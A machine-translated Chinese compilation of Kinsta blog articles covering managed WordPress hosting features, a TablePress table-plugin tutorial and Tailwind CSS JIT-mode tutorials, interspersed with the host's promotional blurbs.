没有什么是 100%防黑客的,这就是为什么 Kinsta 为所有客户提供免费的黑客补丁。没错!在最近那些与社会战争,WP 谷歌地图等插件漏洞。我们的团队让客户知道并清理了受影响的网站。在某些情况下,我们的系统管理员甚至在服务器级别修补东西。我们非常重视安全性,并且在涉及到您的网站时会积极主动。
4.确保选择正确的缓存解决方案
说到性能,没有什么比缓存更重要了!
缓存是存储来自一个请求的资源并为后续请求重用这些资源的过程。基本上,它减少了生成页面视图所需的工作量。您希望尽可能多地从缓存中为您的站点提供服务。这就是那些光速如此之快的原因。
当涉及到管理您自己的服务器时,您将需要做出决定。你应该实现一个服务器级的缓存解决方案(比如 nginx fastcgi cache module )还是用一个 WordPress 缓存插件比如 WP Rocket?混合方法也是另一种选择。
除非你已经测试了几十种不同的解决方案和技术,否则你怎么知道哪一种是最好的或最快的呢?作为一名系统管理员,你应该明白字节码缓存、对象缓存、页面缓存、Varnish、Redis 等的区别。,以及它们如何与服务器和插件交互。拥有一个良好的缓存解决方案意味着慢速和快速站点之间的区别。
Kinsta 为您处理缓存(不需要插件)
如果您使用 Kinsta 托管,我们会在服务器级别自动为您处理缓存。我们的服务器使用nginx fastcgi cache module来提供快速页面缓存。
页面缓存配置为开箱即用,支持标准的 WordPress、BuddyPress、 WooCommerce 和简易数字下载网站。你什么都不用做!只需启动你的 WordPress 站点,页面缓存就会开始。
每当您对页面或博客文章进行编辑时,页面的缓存以及归档页面都会自动清除。这确保您的访问者看到新鲜和最新的内容。我们还对归档页面施加了最短的节流时间,以确保始终保持高可用性。
虽然它在技术上不是一个缓存插件,但我们的必须使用(MU)插件安装在每个网站上,让您可以更精细地控制您的缓存。你可以很容易地从 WordPress 管理工具栏清除你站点的缓存,或者添加自定义路径,以便在我们站点更新时清除。
Granular caching controls at Kinsta
你也可以通过简单的点击从 MyKinsta 仪表板中清除整个 WordPress 站点的缓存。
Clear WordPress cache in MyKinsta dashboard
我们还提供了额外的方法,您可以在我们的 MyKinsta 分析工具和 kinsta 缓存日志中分析您的缓存数据。这有助于确定是否存在可以缓存的绕过 GET 请求的缓存,或者可以消除的 POST 请求。
缓存组件堆栈(如下所示)让您可以看到每个请求的状态,是命中、绕过、未命中还是过期。您可以按过去 24 小时、7 天或 30 天过滤数据。
Kinsta cache component stack
高速缓存组件图表让您对高速缓存比率一目了然。从缓存中处理的请求越多越好。正如你在下面的例子中看到的,这个 WordPress 站点有 96.2%的缓存命中率。哪个好!
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Kinsta cache component chart
“顶级高速缓存旁路”部分使您可以看到哪些请求没有得到高速缓存的服务。通常这些可能包括 CRON 作业、admin-ajax 请求、电子商务结账页面、查询字符串和 UTM 参数等。
WordPress top cache bypasses
5.暂存环境并不神奇地存在
暂存环境提供了一种简单无风险的方式来测试更新(插件、WordPress 核心、主题)、调试代码,并在不影响生产站点的情况下进行开发工作。如今,我们许多人都认为集结地是理所当然的。但是想象一下如果你没有呢?你会怎么做?
如果您在管理自己的服务器,您需要实现自己的解决方案。如果你使用的是 VPS 提供商,如数字海洋(T1)或 T2(T3),你可以克隆你的机器,但这不是一个快速的解决方案,也不是免费的。
如果你想要一个更专注于 WordPress 的解决方案,有一些不错的,如 WP Stagecoach (每年 120 美元起)和 ManageWP (每个网站每月 2 美元起),但这些都不是免费的。
如果你比较管理你自己的服务器和托管 WordPress 主机的价格,记住这一点很重要。
Kinsta 提供一键分期付款
在 Kinsta,每个站点都有自己的暂存环境。您所要做的就是单击“创建一个暂存环境”,然后您就可以立即获得生产站点的副本。这使得测试变得非常容易。
Create staging environment
如果一个暂存设置不够,Kinsta 客户还可以选择添加多达五个高级暂存环境。
完成后,只需按一个按钮,您就可以将更改推回到 live。您甚至可以将生产站点的备份恢复到暂存状态。
为了给您尽可能多的空间,在计算您的总磁盘空间使用量时,我们的报告中不包括中转站点。只有实时网站计入您的磁盘空间使用。
6.不要忘记监控
你最不希望看到的就是你的网站在周五凌晨 2 点关闭,直到周一早上你才意识到这一点。这适用于您的服务器和您的站点,因为每个站点都可能有自己的问题,这些问题可能会使它们脱机。
网站宕机会给你带来很多不同的影响。
- 你的收入会受到影响。
- 这对你的品牌和信誉不好。
- 根据停机时间的长短,你的抓取率和搜索排名可能会受到影响。
因此,你必须 24/7/365 全天候监控你的服务器和站点,以确保一切正常顺利运行。如果您管理自己的服务器,这意味着您需要运行时间监控解决方案来提醒您。
Updown
虽然 VPS 提供商如 Digital Ocean 和 Linode 提供服务器监控解决方案,但他们不为你的 WordPress 站点提供。根据您拥有的网站数量和您需要的提醒类型,您很可能需要为单独的服务付费。以下是一些比较流行的解决方案:
别担心,金斯塔会全天候支持你
如果你用 Kinsta 托管,你就不需要担心服务器端的事情。我们的系统管理团队会处理这些问题!如果有问题,您会在 MyKinsta 仪表盘上看到通知,或者您可以查看我们的状态页面。
关于您的站点,我们包括使用 Kinsta APM 工具的额外正常运行时间监控。你也可以使用新遗迹,虽然你需要有自己的许可证。我们每两分钟检查一次我们托管的所有网站的状态。也就是说每天对你的每个网站进行 720 次检查。
我们采取积极主动的方法。这意味着,如果您的网站出现故障,我们将是第一个得到通知的人,我们的工程师将会立即行动!如果需要,如果我们发现您的网站有问题,我们会联系您。这样你就不用担心经常检查或者在假期检查了。
7.你需要 SSL 证书
你的网站应该运行在 HTTPS 之上。最简单和最便宜的方法是免费的加密 SSL 证书。问题是,如果您使用的是准系统或 VPS 提供商,您需要一个系统来进行安装和自动更新(让我们加密每 90 天到期的证书)。
最常见的方法可能是使用 Certbot 。但这需要以下内容:
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
- 在服务器上安装 Certbot
- 设置 Nginx
- 允许 HTTPS 通过防火墙
- 从“让我们加密”获取 SSL 证书
- 验证证书自动续订
另一种方法是使用像 ServerPilot 这样的解决方案以及您的 VPS 提供商。但这不是免费的,ServerPilot 计划起价为每月 5 美元。
Kinsta 有免费的一键式 SSL
Kinsta 让安装 SSL 证书变得异常简单!只需登录我们的 MyKinsta 仪表板,浏览到您的网站,并点击“生成免费的 HTTPS 证书。”很快你的网站就覆盖了 HTTPS。无需担心续约问题,我们的自动化系统会处理好一切。
转而使用自定义 SSL 证书?没问题,很容易从仪表板安装。
One-click Free SSL
经营网店?查看我们关于 WooCommerce 和 SSL 的深度指南。
8.你是 WordPress 性能故障排除方面的专家吗?
这是周一早上的第一件事,你的 WordPress 网站突然变慢了。从哪里开始解决性能问题?是服务器上的某个东西耗尽了所有的资源,还是 WordPress 站点本身的某个东西?有成百上千的事情会导致 WordPress 的性能问题。
如果你在运营一个电子商务或会员制网站,你一定会在某个时候遇到性能问题,因为这些类型的网站都有自己的问题。查看我们的托管 WordPress 会员网站的注意事项。
对性能问题进行故障诊断并找出发生了什么的最简单的方法是使用高级工具,如 New Relic (需要许可证)。有什么问题吗?这个工具在的最低价格是 75 美元/月。
Kinsta 的平台是可扩展的,我们可以帮助您查明性能问题
在 Kinsta 你不用担心服务器资源。我们利用位于谷歌云平台的多个数据中心的虚拟机。我们的每台机器都有多达 96 个 CPU 和数百千兆字节的内存。在可用区域,我们利用他们的计算优化(C2)虚拟机。它们提供了 GCP 在计算引擎上提供的最高每核性能,并针对计算密集型工作负载进行了优化。硬件资源(RAM/CPU)由我们的虚拟机根据需要自动分配给每个站点容器。
我们利用 LXD 托管主机,并为每个站点编排 LXC 软件容器。这意味着每一个站点都位于自己的独立容器中,容器中有运行它所需的所有软件资源(Linux、Nginx、PHP、MySQL)。资源是 100%私有的 ,并且 不会在任何其他人甚至你自己的站点之间共享。
MySQL 数据库托管在本地主机T3,而不是远程服务器。这确保了机器之间没有延迟,从而加快了查询和页面加载速度。
这可能是一个外部服务超时,一个插件或活动主题引起的问题,或者网站数据库正在努力跟上查询的速度。无论是什么问题,我们通常可以缩小范围,并提供如何解决问题的建议。
解决性能问题或插件/主题问题是我们团队每天都要做的事情。你在金斯塔会得到很好的照顾。我们整个支持团队由 WordPress 开发者和 Linux 主机工程师组成。请放心,你将与能提供可行建议的人交谈。
记住,你可以自己潜入新遗迹,但是你必须有自己的执照。
9.更新软件可能很耗时
你更愿意花时间做什么,发展业务还是更新软件?当你管理自己的服务器时,你将不得不一直更新软件,检查安全补丁,并安装诸如最新的 PHP 版本之类的东西。
在大多数情况下,这必须通过命令行中的 SSH 来完成。所以准备好拿出你的sudo apt-get update命令吧。
金斯塔总是提供最新和最伟大的
在 Kinsta 做主机,什么都不用装。从我们的服务器硬件到我们运行的软件,我们只在 Kinsta 使用最好的技术。无论您使用什么样的开发堆栈,我们都会安装最新的框架版本。
我们通常会在官方发布的几周内发布最新版本的 PHP!没错,不像我们的竞争对手,你不会等上几个月甚至几年。如果你想尽快测试,我们甚至尝试发布测试版。
为什么这如此重要?因为在我们最近的 PHP 基准测试中,如果你比较 PHP 7.3 和 PHP 5.6,它每秒可以处理 3 倍的请求(事务)! PHP 7.3 也比 PHP 7.2 平均快 9%。PHP 的最新版本不仅可以帮助你提高网站的速度,还会影响你的 WordPress 管理仪表板的响应能力。
WordPress 5.0 PHP benchmarks
更快的速度加上更好的安全性,是 Kinsta 总是提供最新版本 PHP 的原因。你可以点击一下改变 PHP 版本。
Change to PHP 7.4
10.你必须花时间寻找答案
不管你在管理服务器方面有多好,在某些时候你不可避免地会遇到问题,你必须花时间去寻找答案。无论是浏览 StackOverflow 还是询问同事,这可能都不是很好地利用你的时间。
我们不断有客户将他们的 WordPress 网站迁移到 Kinsta,因为他们很难用他们的 VPS 调试停机时间。
Sysadmin comic (Image source: The Underfold, by Brian Russell)
节省您的时间,使用金斯塔的 24/7 世界一流的支持
不要依赖谷歌来找到你的答案,利用 Kinsta 的专家支持团队,即使在新年前夕,也只需点击一下鼠标。
Kinsta 24/7 support
我们彻底改变了支持的工作方式!我们没有 1 级或 2 级支持代表。我们的整个支持团队由 WordPress 开发人员和 Linux 主机工程师组成,他们中的许多人管理自己的服务器,创建主题和插件,并为 core 做出贡献。这可以确保你从积极使用和开发 WordPress 的人那里得到专家的建议。
通过 @kinsta 托管我的网站让我无比开心。我感觉他们的后援团从来不睡觉!惊人的服务。
—马修·豪威尔斯-巴比ξmhb . eth(@ matthewbarby)2017 年 7 月 3 日
如何用 TablePress 在 WordPress 中轻松创建表格
在你的 WordPress 站点上组织大量数据的最好方法之一是使用一个简单的表格。不幸的是,WordPress 并没有提供表格支持作为一个原生功能。今天我们想深入一个非常流行的 WordPress 插件,名为 TablePress ,并向你展示它如何帮助你在没有任何编码知识的情况下轻松地在 WordPress 中创建表格。它目前拥有超过 700,000 个活跃安装和令人惊讶的 WordPress.org 5 星评级,即使在 2,900+评论之后!
显然,这是一个优秀的、编码良好的插件,在 WordPress 社区引起了很好的共鸣,是在 WordPress 中创建表格的理想解决方案。
TablePress WordPress 插件
在我们深入这篇文章的本质并学习如何在你的 WordPress 文章和页面中添加表格之前,让我们快速看一下 TablePress 提供的一些关键特性,这些特性使它在竞争中脱颖而出。
TablePress WordPress plugin
- 多种导入格式:使用 TablePress,您不仅可以通过在 WordPress 表格编辑器中输入数据来从头开始创建表格,还可以从 Excel、CSV、HTML 和 JSON 文件等多种格式导入数据。这个领域的几个竞争对手插件只提供一种输入格式,在你的指尖有各种各样的输入格式是非常方便的。
- 导出您的表格:如果您已经在 TablePress 界面中创建了一个表格,您可以轻松地将您的表格导出为 CSV、HTML 或 JSON 文件。如果你迁移到一个新的 WordPress 安装或者甚至一个新的 CMS,这是一个非常方便的保存数据的方法。
- 扩展您的能力:TablePress 的开发者 Tobias BTH ge 为 TablePress 开发了几个附加功能,大大扩展了它的能力。这些扩展内置了对诸如制作响应表、列过滤器、前端用户的保存到 PDF 按钮等的支持..所有的扩展都可以免费下载,但是有几个非常耗时的(标有“premium”)建议你在下载它们的时候用的小额捐赠来支持开发者。
如何用 TablePress 在 WordPress 中创建表格
现在我们已经介绍了这个插件的特性,让我们深入了解如何使用 TablePress 在 WordPress 中插入表格。
从头开始创建表格
让我们从了解如何使用 TablePress 非常简单直观的界面从头开始创建表格开始我们的教程。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
第一步
在你的仪表板中安装并激活插件后,前往 WP 管理>表按。这个页面是插件的控制中心。创建、编辑和定制表格的过程都将从这里开始。第一次访问该页面时,您会发现一条欢迎消息,其中包含 FAQ 、文档、支持链接以及您的表格列表(将为空)。首先,单击页面导航上的“添加新项”按钮。
TablePress options
第二步
在 Add New 页面上,将提示您键入表的名称,输入描述(可选),并指定表的维度(行数和列数)。完成后,点击“添加表格”按钮。作为一个例子,我们将做一个虚构的蛋糕面包店表。
Add new table in TablePress
第三步
在下一页,您的表格将被分配一个 ID 和一个短代码,您将使用该短代码将表格添加到您的帖子和页面中。您还将开始填写新表格的各个单元格。用于填写表格的界面简单明了,有点类似于普通的 Excel 电子表格。这是当你的表格都填好之后的样子。
TablePress shortcode
第四步
在同一页面的更下方,您可以尝试一些基本选项。您可以在单元格中插入链接/图像,复制/删除选定的行和列,添加 CSS 类以进行样式设置,合并单元格,逐行替换颜色,启用排序/分页,等等。
该插件会自动假设你的第一行是表格的标题行,但是你可以选择不这样做,甚至可以将最后一行改为表尾。
TablePress manipulation
还有一个“高级编辑器”按钮,为您提供了一个功能更强大的界面,您可以在其中输入表格数据。
TablePress advanced editor
不过,使用起来相当耗时,因为您必须单击该按钮,然后单击您想要编辑的单元格,才能访问高级编辑器,并且您必须对每个单元格重复这一操作。在我们看来,真的不值得这么麻烦。但是根据你输入的数据量,它可能是有用的。
TablePress advanced editor-box
第五步
一旦你完成了表格的编辑并定制了选项,点击“保存修改”按钮,然后点击页面底部的“预览”按钮,就可以对你的表格插入文章或页面后的样子有一个基本的了解。
我们发现这个预览与你的成品在风格上的实际外观相差甚远。由于如此多的造型取决于你的主题,预览并没有真正做到最终的外观(这真的比你在下面的截图中看到的笨重的表好得多)。
TablePress preview
第六步
现在,在文章或页面中,您可以通过两种不同的方式插入表格。第一种方法是复制并粘贴前面的短代码。对于我们的示例表,因为它是我们创建的第一个表,所以简码是[table id=1 /]。短码格式非常容易记忆。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
TablePress shortcode in post
第二种方法是使用可视化编辑器工具栏中的“从 TablePress 插入表格”按钮。
Insert a table from TablePress
这是一个运行默认Twenty thinge 主题的网站的最终输出的例子。无论如何造型都不差。请注意网站访问者的分页和搜索选项。
TablePress example on page
导入表格
如果你已经准备好了数据(比如一个 Excel 表格或者 Google Sheets 文档),并且正在等待外部格式,你可以直接把它导入到 TablePress 插件中。
第一步
要导入表格,导航到 WP 管理>表格按>导入表格。在此页面上,您将选择导入源(直接上传、URL、服务器上的文件或手动输入空白文本区域)。我的示例数据来自我们下载为 CSV 格式的 Google Sheets 文档。
不过,这一部分真正酷的是,您可以选择将导入的数据用于一个全新的表,或者作为已经创建的现有表的替换/附加数据。在本例中,我们将添加一个新表。
Import table in TablePress
第二步
单击“导入表格”按钮后,您将被重定向到与从头开始创建表格时完全相同的编辑页面。除了这一次,表名、描述和内容都已经填写好了。剩下要做的就是定制底部的选项。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
Imported table options
第三步
再一次,在 post/page 中使用分配的表短代码(这次第二个表是[table id=2 /])并享受结果。请注意,由于所有数据都与我们从头开始创建表时相同,因此输出也完全相同。
TablePress example on page
导出表格
就像我们在本文开始时讨论的那样,该插件还带有一个内置选项来导出您的表格。这是一个非常简单的一步到位的过程。
第一步
导航到 WP 管理>表格按>导出表格。在这里,您可以选择要导出的表格,以及导出的格式(CSV、HTML 或 JSON)。如果您使用下面的 CSV 选项,您还可以将 CSV 分隔符设置为逗号(,)、分号(;),或者制表键(\t)。如果一次导出多个表,zip 存档是必需的。
Export table in TablePress
一旦你选择了正确的表格和导出格式,只需点击“下载导出文件”按钮,并获得您的数据。
插件选项
TablePress 的插件选项页面很少。尽管它提供了一个易于使用的界面和许多导入/导出选项,但内置的可定制性非常有限,正如您在下面看到的(尽管它可以通过插件进行一些扩展)。
TablePress plugin options
要进行真正的样式定制,您必须在上面的文本区域中编写定制的 CSS 命令。如果你不精通代码,不要担心——插件开发者已经在中包含了一些关于如何编写基本 CSS 命令的文档,比如改变特定行的背景颜色、突出显示某些单元格、将表格置于页面中央等。你也可以改变一些用户选项,比如显示 TablePress 的管理菜单部分,以及插件语言(目前支持 20 多种)。
关于 TablePress 的最终想法
毫无疑问,TablePress 绝对是市场上功能最强大、最直观的表格插件之一。它有许多功能,但也有一些不足之处。根据我对这个插件的体验,这里有一些优点和缺点。
赞成的意见
- 开箱即用的出色造型。
- 非常直白的界面;新手友好。
- 多种导入格式:CSV、HTML、JSON 和 Excel。
- 多种导出格式:CSV,HTML,JSON。
- 用户可以在表中搜索特定的数据字符串。
- 表格可以按特定的行数进行分页。
- 大量免费的插件扩展可用(这确实表明开发者投入了大量的思想和努力来使插件成为 WordPress 社区的一个伟大资源)。
骗局
- 高级编辑器使用起来很耗时(需要大量点击)。
- 有限的造型定制内置。
- 开箱即用时没有响应,但您可以利用扩展来完成这项工作。
- 你必须手动输入数据或从电子表格中导入数据。如果你想创建已经存储在你的网站上的数据表(例如博客文章、电子商务产品或自定义文章类型),那么你可能会受益于一个动态的 WordPress 表格插件,例如 Posts Table Pro 。
希望这篇教程能帮助你深入了解如何使用 TablePress 提供的所有功能,以及如何在 WordPress 中轻松创建表格。如果你有任何问题或者想澄清一些事情,请在下面评论。此外,如果你有任何使用 TablePress(或任何其他在 WordPress 中内置表格支持的插件)的个人经验,欢迎在下面的评论中分享。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
主顺风 CSS 及其即时(JIT)模式
实用优先框架帮助我们更快地设计网页,而 Tailwind CSS 已经成为最流行的框架之一。但是受欢迎不代表完美。
使用 Tailwind CSS 有一些挑战,比如在开发过程中有一个巨大的样式表,我们必须自己启用额外的变体,等等。在本教程中,我们将主要关注这些挑战的解决方案。
在本教程中,我们将讨论 Tailwind CSS 框架的一个非常重要的特性,称为实时编译器,通常称为 JIT 编译器。
我们将强调使用 Tailwind CSS JIT 编译器的特性和好处,如何启用它,并查看一些实际例子。
让我们开始吧。
什么是 Tailwind CSS JIT (Just-in-Time)编译器?
在我们谈论实时编译器之前,我们首先需要谈论一下 Tailwind CSS。
Tailwind CSS 是一个实用优先的 CSS 框架,具有一组预定义的 CSS 类,可以直接应用于我们的标记中,以加快网页的设计,并使用预定义的系统保持设计的一致性。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
在 JIT 编译器发布之前,我们在安装后生成的 Tailwind CSS 文件大小通常高达 3 MB。但是,随着您继续配置和定制 Tailwind,文件会变得越来越大——在某些情况下,您最终会得到一个 15 MB 大的样式表。
尽管我们所有未使用的样式都会在生产过程中被清除,但在开发过程中却不是这样。对于 10 MB 甚至 20 MB 的样式表,我们肯定会遇到问题,导致我们的开发工具滞后。
使用 JIT 编译器,样式是在我们构建项目时生成的。这意味着只有您当前正在使用的实用程序类将被包含在样式表的大小中,而不是 Tailwind CSS 附带的所有实用程序类。
使用顺风 CSS JIT 模式的好处
在这一节中,我们将讨论使用 JIT 编译器的一些好处。它们包括:
- 你的样式表在开发和生产中是一样的。
- 更快的构建时间。
- 默认情况下,所有变体都是启用的。
- 开发过程中的编译要快得多。
- 仅生成使用过的样式。
- 变体可以堆叠。
- 改进的开发工具性能。
使用 Tailwind CSS JIT 编译器的缺点
根据 JIT 编译器 GitHub 文档,目前已知的限制有:
- 不支持高级 PurgeCSS 选项。
- “您只能使用属于核心、由插件生成或在
@layer规则中定义的@apply类。你不能@apply没有在@layer规则中定义的任意 CSS 类。” - 仅支持 PostCSS 8。
@apply指令用于在自定义 CSS 中应用实用程序类。当我们定义自定义 CSS 样式,但更喜欢使用一些已经定义的实用程序类时,这是很有用的。下面是一个关于@apply指令如何工作的例子:
.my-custom-css {
@apply text-green-500;
}
在上面的代码中,我们向自定义 CSS 类添加了绿色。绿色是使用顺风实用程序类应用的。
如何启用顺风 CSS JIT 模式
请注意,在撰写本文时,Tailwind CSS 版本 3 已经发布,并且在安装 Tailwind CSS 时默认启用。下面关于启用 JIT 编译器的解释不适用于版本 3 和更高版本。本教程中涉及的所有其他示例都与版本 3 兼容。
启用 JIT 编译器非常容易。您所要做的就是通过添加 mode 属性来更新您的 tailwind.config.js 文件,该属性的值应该为“jit”。
您的 tailwind.config.js 应该是这样的:
module.exports = {
mode: 'jit',
purge: ['./public/*.html'],
darkMode: false, // or 'media' or 'class'
theme: {
extend: {},
},
variants: {
extend: {},
},
plugins: [],
}
需要重点关注的一行是我们添加的部分:
mode: 'jit'
这使我们能够使用 JIT 编译器的特性。
完成后,您可以运行 build 命令并看到文件大小减小了。你只会看到你正在使用的样式。
随着文件大小的减小,开发和生产过程中的样式表将保持不变。开发人员工具滞后的可能性也将被降低到最小,并且当您构建项目时,您的代码会编译得更快。
接下来,我们将看到 JIT 编译器的一些实际应用。
这使我们能够使用 JIT 编译器的特性。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
完成后,您可以运行 build 命令并看到文件大小减小了。你只会看到你正在使用的样式。
随着文件大小的减小,开发和生产过程中的样式表将保持不变。开发人员工具滞后的可能性也将被降低到最小,并且当您构建项目时,您的代码会编译得更快。
接下来,我们将看到 JIT 编译器的一些实际应用。
如何使用 Tailwind CSS JIT 编译器
在这一节中,我们将看到 JIT 编译器的一些实际例子。我们将从帮助我们扩展 Tailwind 设计系统的任意值开始。
任意值
可能会出现这样的情况,我们宁愿使用已经创建的设计系统之外的值。这些值可能是我们的颜色、填充、边距、宽度等等。
JIT 编译器使我们能够通过使用任意值来实现这一点。这些任意值允许我们打破设计系统,定义我们自己的自定义值。您会在以下语法中看到这些值:[300px],[#FA8072]。
为了做到这一点,我们必须将值放在方括号中,这样 Tailwind 就知道我们正在设计系统中定义新的值。下面是一个例子:
<div class="mt-[300px] w-[500px]">
</div>
在上例中,我们使用了两个新值——300 px 和 500px,这两个值最初在设计系统中并不存在。在 JIT 编译器之前,您可能必须首先在 config.js 文件中定义这些值才能达到同样的效果。
下一个示例显示了如何将新颜色值定义为:
<p class="bg-[#FA8072] ">This paragraph has a salmon background </p>
这里,我们创建了一个带有鲑鱼色背景的段落。你不会看到一个写着 bg-salmon 的 Tailwind 实用程序类,但是我们可以用一个任意的值来定义它。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
可堆叠的变体
使用 JIT 编译器,默认情况下所有变体都是启用的,所以您可以不用考虑使用 config.js 文件来启用任何变体。除此之外,变体可以被堆叠以实现令人敬畏的结果。
每个变量由冒号分隔。
这里有一个例子:
<button class="sm:dark:disabled:focus:hover:bg-blue-300">
上面的代码创建了一个关闭了 focus 属性的按钮,当鼠标悬停在按钮上时,按钮变成蓝色。
伪元素
JIT 编译器允许我们设计伪元素的样式。伪元素用于样式化元素的特定部分,例如样式化元素的第一个字母或者在元素之前/之后插入内容。
这里有几个例子:
<p class="first-letter:bg-green-600">
First letter will have a green color
</p>
在上面的例子中,第一个字母“M”是绿色的。
<p class="selection:bg-green-600">
Highlight this text to see a green color.
</p>
当您突出显示上面代码中的文本时,它会有一个绿色的背景色。
每边边框颜色
出于文件大小的考虑,这个特性最初被忽略了,但是随着 JIT 编译器的发布,这个特性发生了变化。我们可以给每个边框不同的颜色。
让我们来看一个例子:
<div class="border-2 border-t-red-400 border-r-blue-400 border-b-yellow-400 border-l-green-400">
</div>
我们给了 div 多种边框颜色——上边框是红色,右边框是蓝色,下边框是黄色,左边框是绿色。
顺风 CSS 版本 3 中的 JIT 模式
从 Tailwind CSS 版本 3 和更高版本开始,当我们安装 Tailwind CSS 时,JIT 编译器是默认启用的,因此我们不必担心修改 tailwind.config.js 文件中的任何内容。这使我们能够随时访问 JIT 编译器的所有特性。我们所要做的就是遵循当前版本的安装说明,然后我们就可以开始运行了。
摘要
JIT 编译器将 Tailwind CSS 框架提升到了一个全新的水平。它的发布带来了新的有用的特性,让我们可以更好地使用这个框架。我们不再担心我们的文件太大,以至于我们的开发工具滞后,因为只有我们实际使用的样式会生成,所有的都在进行中。
我们看到了一些新功能的例子,如堆叠变体、使用伪元素设计元素样式、使用任意值来扩展我们的设计系统以及非常需要的功能——单独设计元素边框每一侧的样式的能力。我们还远远没有达到 Tailwind 的 JIT 功能的极限,所以您的下一步将是自己进行测试,并探索如何最好地将 JIT 的特性用于您自己的工作。
你利用 JIT 编译器构建了哪些很酷的东西?请在下面的评论中分享你的想法。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何使用 Tailwind CSS 快速开发时尚网站
原文:# t0]https://kinta . com/blog/taiwind-CSS/
随着您作为开发人员的进步,您更有可能使用通过编写更少的代码来帮助您做更多事情的技术。像 Tailwind CSS 这样的可靠前端框架是实现这一目标的一种方式。
在本文中,我们将了解 Tailwind CSS——一个帮助构建和设计网页的 CSS 框架。我们将从解释如何在你的项目中安装和集成 Tailwind CSS 开始,看看一些实际的应用程序,以及你如何创建你的自定义风格和插件。
激动吗?我们开始吧!
查看我们的视频指南使用顺风 CSS 构建网站
什么是顺风 CSS?
Tailwind CSS.
Tailwind CSS 是一个实用优先的 CSS(层叠样式表)框架,带有预定义的类,可以用来直接在标记中构建和设计网页。它让你以预定义类的形式在 HTML 中编写 CSS。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
我们将定义什么是框架,以及我们所说的“实用优先的 CSS”是什么意思,以帮助你更好地理解什么是顺风 CSS。
什么是框架?
作为一个通用的编程术语,框架是一种工具,它提供了可重用的现成组件,这些组件是根据现有工具的特性构建的。创建框架的总体目的是通过做更少的工作来提高开发速度。
既然我们已经确立了框架的含义,它应该可以帮助你理解 Tailwind CSS 是一个建立在 CSS 特性之上的工具。该框架的所有功能都来自于作为类组合的 CSS 样式。
什么是实用优先的 CSS 框架?
当我们说实用优先的 CSS 时,我们指的是我们的标记(HTML) 中具有预定义功能的类。这意味着您只需编写一个附加了预定义样式的类,这些样式将应用于元素。
在使用普通 CSS(没有任何框架或库的 CSS)的情况下,您将首先为元素指定一个类名,然后将不同的属性和值附加到该类,这将依次对元素应用样式。
我们会给你看一个例子。这里,我们将创建一个圆角按钮和一个文本“点击我”这是按钮的外观:
Our button.
我们将首先使用普通 CSS 来完成这项工作,然后使用 Tailwind CSS 中可用的实用程序类。
使用普通 CSS
<button class="btn">Click me</button>
我们已经给了按钮标签类btn,它将使用外部样式表进行样式化。那就是:
.btn {
background-color: #000;
color: #fff;
padding: 8px;
border: none;
border-radius: 4px;
}
带顺风 CSS
<button class="bg-black p-2 rounded">Click me</button>
这些都是实现与普通 CSS 示例相同的效果所必需的。因为我们使用的每个类名都已经有了一个预定义的样式,所以不需要创建外部样式表来编写样式。
使用顺风 CSS 的先决条件
在使用 Tailwind CSS 之前,您应该考虑满足一些先决条件,以便毫无困难地使用框架的特性。以下是其中的几个例子:
- 对 HTML 及其结构和工作原理有很好的了解
- CSS — 媒体查询、flexbox 和网格系统的坚实基础
Tailwind CSS 可以用在哪里?
可以在前端 web 项目中使用 Tailwind CSS,包括类似 React.js 、 Next.js 、 Laravel 、Vite、Gatsby 等 JavaScript 框架。
顺风 CSS 的利与弊
以下是使用 Tailwind CSS 的一些优势:
- 更快的开发过程
- 帮助你练习你的 CSS,因为实用程序是相似的
- 所有实用程序和组件都可以轻松定制
- 生产文件的总体大小通常很小
- 如果你已经知道 CSS,很容易学会
- 良好的学习文档
使用顺风 CSS 的一些缺点包括:
- 对于大型项目,您的标记可能看起来杂乱无章,因为所有样式都在 HTML 文件中。
- 如果你不能很好地理解 CSS,学习起来并不容易。
- 您被迫从头开始构建一切,包括您的输入元素。安装 Tailwind CSS 时,它会删除所有默认的 CSS 样式。
- 如果你想尽量减少花在开发网站前端(T2)和主要关注后端(T4)逻辑(T5)上的时间,那么顺风 CSS 不是最好的选择。
何时使用顺风 CSS
Tailwind CSS 最适合用来通过编写更少的代码来加快开发过程。它附带了一个设计系统,有助于保持各种设计要求的一致性,如填充、间距等;有了这个,你就不必担心创建你的设计系统。
如果你想使用一个易于配置的框架,你也可以使用 Tailwind CSS,因为它不会强迫你一直以同样的方式使用组件(导航栏、按钮、表单等等);你可以选择你的组件应该是什么样子。但是如果你没有学习和练习过 CSS,就不要使用 Tailwind。
Tailwind CSS 和其他 CSS 框架的异同
以下是一些相似之处:
- 它们帮助您更快地完成工作。
